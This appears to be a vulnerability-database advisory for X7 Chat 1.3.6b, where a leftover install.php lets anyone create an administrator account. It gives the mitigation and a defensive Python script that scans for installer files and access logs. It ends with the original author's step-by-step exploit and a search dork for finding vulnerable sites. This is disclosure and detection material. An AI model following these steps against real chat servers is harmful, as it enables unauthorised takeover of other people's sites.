Vendor: X7 Chat
By: d4rk-h4ck3r
CVSS: 9.3 (HIGH)
Type: Remote Code Execution
CWE: 20
Product Name: X7 Chat
Affected Version From: 1.3.6b
Affected Version To: 1.3.6b
Patch Exists: YES
Related CWE: N/A
CPE: a:x7chat:x7_chat:1.3.6b
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2009

X7 Chat 1.3.6b Remote Admin Account Creation

The vulnerability exists because the 'install.php' setup script remains reachable after installation and performs insufficient validation of user-supplied input. A remote attacker who can reach 'install.php' on a vulnerable system can use it to create an administrator account.

Mitigation:

Delete the file install.php after finishing the online setup.
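Two checks a defender would want alongside that mitigation, as an added example (not part of the advisory or of the X7 Chat project): a scan of a document root for installer scripts that were never deleted, and a pass over web-server access logs that flags any request to install.php, with a POST to step=4 (the step where the account is created) reported as a suspected account creation. The log lines, IP addresses and paths below are constructed sample data; the combined log format regex is an assumption about the server's logging configuration.

```python
import os
import re
from urllib.parse import urlparse, parse_qs

# Installer scripts that must not survive on a production document root.
INSTALLER_NAMES = {"install.php"}

# Apache/nginx "combined" log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access-log lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2009:12:00:01 +0000] "GET /x7chat/install.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2009:12:00:09 +0000] "GET /x7chat/install.php?step=4 HTTP/1.1" 200 962 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2009:12:00:31 +0000] "POST /x7chat/install.php?step=4 HTTP/1.1" 200 511 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2009:12:01:00 +0000] "GET /x7chat/index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
    'this line is not in combined format and is skipped',
]


def list_files(webroot):
    """Yield every file path below a document root (thin wrapper around os.walk)."""
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            yield os.path.join(dirpath, name)


def find_leftover_installers(paths):
    """Return the paths whose file name is an installer script, sorted for stable output.
    Matching is case-insensitive so INSTALL.PHP on a case-insensitive host is caught too."""
    return sorted(p for p in paths if os.path.basename(p).lower() in INSTALLER_NAMES)


def flag_installer_requests(log_lines):
    """Return (ip, method, step, status) for each request that reached an installer script.
    Lines that do not parse are skipped rather than raising, so a noisy log does not
    abort the scan. Any hit after setup is finished deserves a look."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parsed = urlparse(m.group("target"))
        if os.path.basename(parsed.path).lower() not in INSTALLER_NAMES:
            continue
        step = parse_qs(parsed.query).get("step", [None])[0]
        findings.append((m.group("ip"), m.group("method"), step, int(m.group("status"))))
    return findings


def suspected_account_creation(findings):
    """IPs that submitted the step=4 form, i.e. the step at which an admin account is created."""
    return sorted({ip for ip, method, step, _status in findings if method == "POST" and step == "4"})


if __name__ == "__main__":
    for path in find_leftover_installers(list_files(".")):
        print("leftover installer:", path)
    hits = flag_installer_requests(SAMPLE_LOG)
    for hit in hits:
        print("installer request:", hit)
    print("suspected account creation from:", suspected_account_creation(SAMPLE_LOG and hits))
```

Run it from the web server's document root to list installers still on disk; feed real access-log lines to flag_installer_requests to see whether the installer was ever reached after the site went live. A 200 on a GET to install.php alone already means the mitigation was not applied.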

Exploit-DB raw data:

#####################################################
# [+] Author : d4rk-h4ck3r
# [+] Email : tnst@w.cn
# [+] Site : www.vbspiders.com/vb
# [+] Team : Tunisian Security TeaM
# [+] Dork : powered by x7 chat 1.3.6b
#####################################################

##### Exploit-DB Notes ############
# Vendor has already addressed this issue and even provided a solution in Docs/INSTALL.txt:
# "After finishing the online setup delete the file install.php.  If you do not it will be 
# possible for anyone to create an administrator account on your chat server."
# 
# Therefore please keep in mind this exploit is not guaranteed to work.
#####################################################



The exploit:
1- Go to http://site.com/script/X7Chat/install.php
2- Now you are in X7 Chat Install step 1; click continue.
3- Now you are in X7 Chat Install step 2; click continue as well.
4- Now you are in X7 Chat Install step 3.
 Change the URL from http://site.com/script/x7chat/install.php?step=3 to http://site.com/script/x7chat/install.php?step=4
5- Now add a user name and password.
6- Go to the login page http://site.com/script/X7Chat/index.php

Good luck and don't make something bad.


Greetz to Password & Maxilog.